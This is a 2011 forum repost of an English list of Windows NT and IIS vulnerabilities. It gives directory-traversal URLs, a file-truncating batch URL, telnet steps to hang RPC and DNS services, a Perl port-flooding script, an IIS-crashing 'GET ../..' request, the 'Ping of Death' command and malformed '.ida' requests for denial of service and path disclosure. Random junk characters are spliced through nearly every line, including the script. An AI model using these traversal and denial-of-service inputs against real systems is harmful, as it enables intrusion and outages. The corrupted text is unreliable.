標題: NT的漏洞及描述(英文) [打印本頁] 作者: 雜七雜八 時間: 2011-1-13 17:12 標題: NT的漏洞及描述(英文) 受影響系統(tǒng):4.0,iis 1.0 7 Q, ^3 d: b0 U. L5 W3 pA URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.0 C: }$ \7 y& c6 b
1 H; b3 I0 r t# b, R+ ~: l+ V. {
A URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script., ]5 |& w: X) z# O. x! _- _% N6 e
) `) |. R, T3 W! SBy default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.8 F3 W3 D5 ?# Q6 h6 r5 J3 z6 S* X) q
. d' X& s2 D/ c r2 ?-------------------------------------------------------------------- 5 D3 q* B. [- z( N C% B$ Z ' J+ T( H: n9 \' E) |" k受影響系統(tǒng):4.0 " c+ v3 o5 O0 X+ `, H4 L7 N4 D5 FA URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat''.* a4 {( _$ \6 m+ O; O: [
C# |; ^1 b l1 W
If the file 'target.bat' exists, the file will be truncated.; l' \- H6 H1 G
' I. f( A/ z8 n9 {; Q---------------------------------------------------------------------- - |- i7 k) n$ C+ o- B" o % z: m8 T3 X8 ^+ V( w受影響系統(tǒng):3.51,4.09 |: ]: }- B$ B5 G' Q4 L
Multiple service ports (53, 135, 1031) are vunerable to 'confusion'. 2 X9 O g; s- b; d) X, `; a- B$ I. c- e
The following steps; % Q/ g& Y5 t, L; x, \. P8 z- J* I " h/ J* h3 U4 {Telnet to an NT 4.0 system on port 135 3 Y, J( l3 V! I* O
Type about 10 characters followed by a <CR> ) b/ s8 @& T2 X3 U* Q- ~7 W" s7 Z
Exit Telnet " \& x, [& F$ _: F" i+ b; V3 eresults in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system. - ~, t' h& w L5 }$ S" i " U& `, ]$ F6 `2 v l6 Q; CWhen launched against port 135, NT Task manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted. ( }3 T7 D, s3 v1 O ; d" y9 a' j! U# J, xThe above also works on port 1031 (inetinfo.exe) where IIS services must be restarted. 9 t$ `, n( g }# b) _4 |( N% F: J
If a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning. . i$ F& J& \$ a$ F. B8 ]8 { K) D" u1 W
The following is modified perl script gleaned from postings in the NTsecurity@iss.net list to test ports on your system (Perl is available from the NT resource kit):$ E N5 a* G w" K, C1 Z- x# i# N9 O! G
# K3 @: E4 g$ b, W( b! V' {/*begin poke code*/ ) y. U, ~ C: t8 E5 c5 |) f- }) I1 O6 Q) V) u5 Q9 H
use Socket; & G A# w5 I I, L% J, r: muse FileHandle; 9 A2 O$ W9 o2 K# r" [require "chat2.pl";8 S% K5 b$ a5 d- ] M( V9 c6 j5 }
& _" y+ P; d6 i9 ~, A2 u) o
$systemname = $ARGV[0] && shift; - d) D& z8 V8 o' U% `1 j$ C. V9 E+ g) G: @
$verbose = 1; # tell me what you're hitting 0 U9 M, X" i4 ], e. {1 b( q$knownports = 1; # don't hit known problem ports + N, G# o& ]7 Sfor ($port = $0; $port<65535; $port++) 0 [3 S; i1 R' M+ l7 O7 ?{) p" K- M) N- j6 q) K
1 q$ {9 [$ w; Z8 G5 w! b
" g" s' B& Y: Y2 {
if ($knownports && ($port == 53 || $port == 135 || $port== 1031)) { * u2 c/ G7 |( H! H* G0 q- jnext;: [1 z8 N% }9 _- }) p
}: q- ?+ W" i; z% V6 W
$fh = chat::open_port($systemname, $port); 4 m W# u& p3 g# f# m& schat::print ($fh,"This is about ten characters or more"); / G1 k& F6 {) V A: Xif ($verbose) { , Q2 k4 s, ^1 t5 c/ E! G! l" Wprint "Trying port: $port\n"; " w, w3 V/ G, n( S1 w1 n} # I! t1 Q: l: F: Jchat::close($fh); 4 Q; a/ l0 \8 I& Y6 r- l5 x s) [! t1 U
} - k! g, A. `1 ^ : w) H4 s+ e6 a: G/ O( O4 K, n' a: p
/*end poke code*/5 M3 _1 T8 i0 L* }" @
/ V$ |! R* S# k m q) ySave the above text as c:\perl\bin\poke, run like this: C:\perl\bin> perl poke servername 6 y L/ N6 u: s * j- G7 Q9 D. Z3 u--------------------------------------------------------------------------------, v* [% s: e8 e _' O
1 ^6 B3 K$ z W6 R: M" o0 w
受影響系統(tǒng):4.0 8 T8 _) Z R$ o' T0 pUsing a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr> will crash IIS. 9 N, ]* P- b0 E8 V: v; S+ K7 ]: Z; t, M9 N( L- a
This attack causes Dr. Watson to display an alert window and to log an error: . N3 A( {7 H0 T' n
# N" |6 e. H) l7 X2 y5 m: o"The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"; P( B7 x5 X. P# n! j
# }; S3 ?! N2 r4 i: ^
-------------------------------------------------------------------------------- * n+ k$ Q, R/ v; C0 G, W 3 `* N. E1 L/ b$ F" E% B" F受影響系統(tǒng):3.51,4.0 8 Q2 ?/ U4 T0 F. g# t: v4 U, h4 YLarge packet pings (PING -l 65527 -s 1 hostname) otherwise known as 'Ping of Death' can cause a blue screen of death on 3.51 systems: : x0 r4 v& a* x# {7 V8 X. l4 I( C' c% N* p5 r
STOP: 0X0000001E" E$ P6 T8 A7 U6 s
KMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS + P( m# l5 k+ T& y' a# s" I( W! H4 {/ V# p
-OR-' H; f0 l9 C' k! u$ f
( J. J3 v- M# ?STOP: 0x0000000A 8 L9 {$ j6 o: ?6 ^! u, k3 h3 e9 QIRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS" v, Q. p6 ~: f. m8 k8 Z
; x" }( ~2 n, H. c& o0 B. M
NT 4.0 is vunerable sending large packets, but does not crash on receiving large packets.% V+ o/ H ?7 K3 e0 [' B# T. b$ | V
' c. k p: b) f5 ~
-------------------------------------------------------------------------------- % _9 k$ ? S) S" x9 O3 p7 E! s# |8 \% `1 `% W# p) V( s
Microsoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have 2 kinds of results. One possible outcome is that the server responds with a message like "URL String too long"; "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service attack against the server). Vulnerable are all IIS versions (up to and including IIS 5.0). When a remote attacker issues a URL request with the malformed URL: http://www.example.com/...[25kb of '.']...ida The server will either crash (causing an effective DoS attack) or report its current directory location (revealing the directory structure). 1 P" a# M( }& N' L6 W8 I- s# o! S# d1 A4 B: i6 b2 ]3 a
-------------------------------------------------------- * G% s7 E$ L9 E2 g- v# } D# k* j' T, l$ g
IIS, Microsoft's Internet Information Server, can be used to reveal the true path of the files (where they physically reside on the local hard drive), by requesting a non-existing file with an IDQ/IDA extension. By requesting a URL such as: http://www.microsoft.com/anything.ida Or: http://www.microsoft.com/anything.idq A remote user will get a response that looks like: 'The IDQ d:\http\anything.idq could not be found' Such a response allows him to gain further knowledge on how the web site is organized and the directory structure of the server